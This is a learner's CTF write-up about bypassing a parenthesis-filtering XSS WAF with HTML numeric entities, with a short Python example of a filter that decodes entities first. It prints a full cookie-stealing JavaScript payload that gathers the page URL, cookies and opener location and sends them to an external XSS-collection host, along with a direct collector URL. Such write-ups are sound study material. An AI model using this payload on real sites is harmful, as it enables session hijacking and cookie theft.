I had never done an XSS challenge before. I worked through this one by following a writeup and felt there was something worth recording about it.
XSS WAF bypass
Parentheses () are filtered, so the whole payload is converted into HTML markup encoding, which in practice means writing each character as its ASCII code prefixed with &#.
Payload:
<svg><script>eval("" + output + "")</script>
Here output is the following, converted into HTML markup encoding. It is the payload that the XSS platform ships with; I did not understand it, so here it is with the code format tidied up.
(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0 &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+ '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+ '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+ '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
It is very clear: data such as document.cookie is collected and sent straight to the XSS platform with a GET request.
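An added example (not from the original writeup) of why the filter described above is weak: a rule that blocks literal parentheses on the raw input lets numeric entities through, while a check that unescapes entities before matching (hypothetical helper names, written here for illustration) catches the same input. The encoder reproduces the transformation the writeup describes on a constructed sample string.

```python
import html
import re

# Constructed stand-in for the challenge's WAF rule: block literal parentheses.
BLOCKED = re.compile(r"[()]")


def to_numeric_entities(text: str) -> str:
    """Encode every character as a decimal HTML entity (&#NN;), as the writeup describes."""
    return "".join(f"&#{ord(c)};" for c in text)


def naive_filter_allows(payload: str) -> bool:
    """Matches the raw input only; entity-encoded parentheses are not seen."""
    return BLOCKED.search(payload) is None


def hardened_filter_allows(payload: str) -> bool:
    """Unescape entities before matching.

    The loop is bounded and repeats until the text stops changing, so a
    double-encoded input such as &amp;#40; is normalised as well.  Input
    normalisation is a stopgap; context-aware output encoding at render time
    is the real fix for XSS.
    """
    decoded = payload
    for _ in range(5):
        nxt = html.unescape(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return BLOCKED.search(decoded) is None


if __name__ == "__main__":
    raw = "alert(1)"  # constructed sample; stands in for the platform payload
    encoded = to_numeric_entities(raw)
    print(encoded)
    print("naive allows raw:     ", naive_filter_allows(raw))
    print("naive allows encoded: ", naive_filter_allows(encoded))
    print("hardened allows encoded:", hardened_filter_allows(encoded))
```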
You can try accessing this directly:
http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123
(Replace the id with your own project's.)
The corresponding project then receives the corresponding cookie: 1234
The platform comes with a lot of payloads; the ones I analysed before never succeeded, and this one finally worked, hhh, a little exciting.
CSP bypass
I was stuck here for two days and did not figure it out.
substr(md5($str), 0, 6) === "d05a29"
There is still a lot I feel I have not written down!!! To be added.